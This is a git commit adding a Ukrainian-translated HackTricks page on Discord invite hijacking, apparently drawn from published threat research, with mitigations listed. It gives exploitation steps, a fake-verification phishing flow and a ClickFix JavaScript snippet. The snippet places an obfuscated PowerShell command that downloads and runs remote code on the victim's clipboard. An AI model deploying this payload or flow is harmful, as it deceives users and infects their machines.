mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Translated ['src/generic-methodologies-and-resources/phishing-methodolog
This commit is contained in:
		
							parent
							
								
									f7e16b78f3
								
							
						
					
					
						commit
						3591511bb9
					
				@ -29,6 +29,7 @@
 | 
			
		||||
- [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
 | 
			
		||||
  - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
 | 
			
		||||
  - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
 | 
			
		||||
  - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
 | 
			
		||||
  - [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
 | 
			
		||||
- [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
 | 
			
		||||
  - [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)
 | 
			
		||||
 | 
			
		||||
@ -0,0 +1,61 @@
 | 
			
		||||
# Discord Invite Hijacking
 | 
			
		||||
 | 
			
		||||
{{#include ../../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
Вразливість системи запрошень Discord дозволяє зловмисникам отримувати доступ до застарілих або видалених кодів запрошень (тимчасових, постійних або кастомних) як нових посилань на будь-якому сервері з підвищенням рівня 3. Нормалізуючи всі коди до нижнього регістру, зловмисники можуть попередньо зареєструвати відомі коди запрошень і тихо перехопити трафік, як тільки оригінальне посилання закінчує термін дії або сервер-джерело втрачає своє підвищення.
 | 
			
		||||
 | 
			
		||||
## Типи запрошень та ризик перехоплення
 | 
			
		||||
 | 
			
		||||
| Тип запрошення       | Можна перехопити? | Умови / Коментарі                                                                                       |
 | 
			
		||||
|-----------------------|-------------------|------------------------------------------------------------------------------------------------------------|
 | 
			
		||||
| Тимчасове посилання   | ✅                | Після закінчення терміну дії код стає доступним і може бути повторно зареєстрований як кастомне URL на підвищеному сервері. |
 | 
			
		||||
| Постійне посилання    | ⚠️                | Якщо видалено і складається лише з малих літер та цифр, код може знову стати доступним.                 |
 | 
			
		||||
| Кастомне посилання    | ✅                | Якщо оригінальний сервер втрачає своє підвищення рівня 3, його кастомне запрошення стає доступним для нової реєстрації. |
 | 
			
		||||
 | 
			
		||||
## Кроки експлуатації
 | 
			
		||||
 | 
			
		||||
1. Розвідка
 | 
			
		||||
- Моніторинг публічних джерел (форумів, соціальних мереж, каналів Telegram) на наявність посилань на запрошення, що відповідають шаблону `discord.gg/{code}` або `discord.com/invite/{code}`.
 | 
			
		||||
- Збір цікавих кодів запрошень (тимчасових або кастомних).
 | 
			
		||||
2. Попередня реєстрація
 | 
			
		||||
- Створіть або використовуйте існуючий сервер Discord з привілеями підвищення рівня 3.
 | 
			
		||||
- У **Налаштуваннях сервера → Кастомне URL**, спробуйте призначити цільовий код запрошення. Якщо прийнято, код резервується зловмисним сервером.
 | 
			
		||||
3. Активація перехоплення
 | 
			
		||||
- Для тимчасових запрошень чекайте, поки оригінальне запрошення не закінчить термін дії (або видаліть його вручну, якщо ви контролюєте джерело).
 | 
			
		||||
- Для кодів, що містять великі літери, варіант з малими літерами можна отримати негайно, хоча перенаправлення активується лише після закінчення терміну дії.
 | 
			
		||||
4. Тихе перенаправлення
 | 
			
		||||
- Користувачі, які відвідують старе посилання, безперешкодно перенаправляються на сервер, контрольований зловмисником, як тільки перехоплення активується.
 | 
			
		||||
 | 
			
		||||
## Потік фішингу через сервер Discord
 | 
			
		||||
 | 
			
		||||
1. Обмежте канали сервера так, щоб лише канал **#verify** був видимим.
 | 
			
		||||
2. Розгорніть бота (наприклад, **Safeguard#0786**), щоб запропонувати новачкам підтвердити через OAuth2.
 | 
			
		||||
3. Бот перенаправляє користувачів на фішинговий сайт (наприклад, `captchaguard.me`) під виглядом CAPTCHA або етапу перевірки.
 | 
			
		||||
4. Реалізуйте трюк UX **ClickFix**:
 | 
			
		||||
- Відобразіть повідомлення про зламану CAPTCHA.
 | 
			
		||||
- Скажіть користувачам відкрити діалог **Win+R**, вставити попередньо завантажену команду PowerShell і натиснути Enter.
 | 
			
		||||
 | 
			
		||||
### Приклад ін'єкції в буфер обміну ClickFix
 | 
			
		||||
```javascript
 | 
			
		||||
// Copy malicious PowerShell command to clipboard
 | 
			
		||||
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
 | 
			
		||||
`$u=($r[-1..-($r.Length)]-join '');` +
 | 
			
		||||
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
 | 
			
		||||
`iex (iwr -Uri $url)"`;
 | 
			
		||||
navigator.clipboard.writeText(cmd);
 | 
			
		||||
```
 | 
			
		||||
Цей підхід уникає прямих завантажень файлів і використовує знайомі елементи інтерфейсу, щоб знизити підозру користувачів.
 | 
			
		||||
 | 
			
		||||
## Заходи пом'якшення
 | 
			
		||||
 | 
			
		||||
- Використовуйте постійні посилання на запрошення, що містять принаймні одну велику літеру або неалфавітний символ (ніколи не закінчуються, не підлягають повторному використанню).
 | 
			
		||||
- Регулярно змінюйте коди запрошень і відкликайте старі посилання.
 | 
			
		||||
- Моніторте статус підвищення сервера Discord і заяви про унікальні URL.
 | 
			
		||||
- Навчайте користувачів перевіряти автентичність сервера та уникати виконання команд, вставлених з буфера обміну.
 | 
			
		||||
 | 
			
		||||
## Посилання
 | 
			
		||||
 | 
			
		||||
- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
 | 
			
		||||
- Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
 | 
			
		||||
 | 
			
		||||
{{#include /banners/hacktricks-training.md}}
 | 
			
		||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user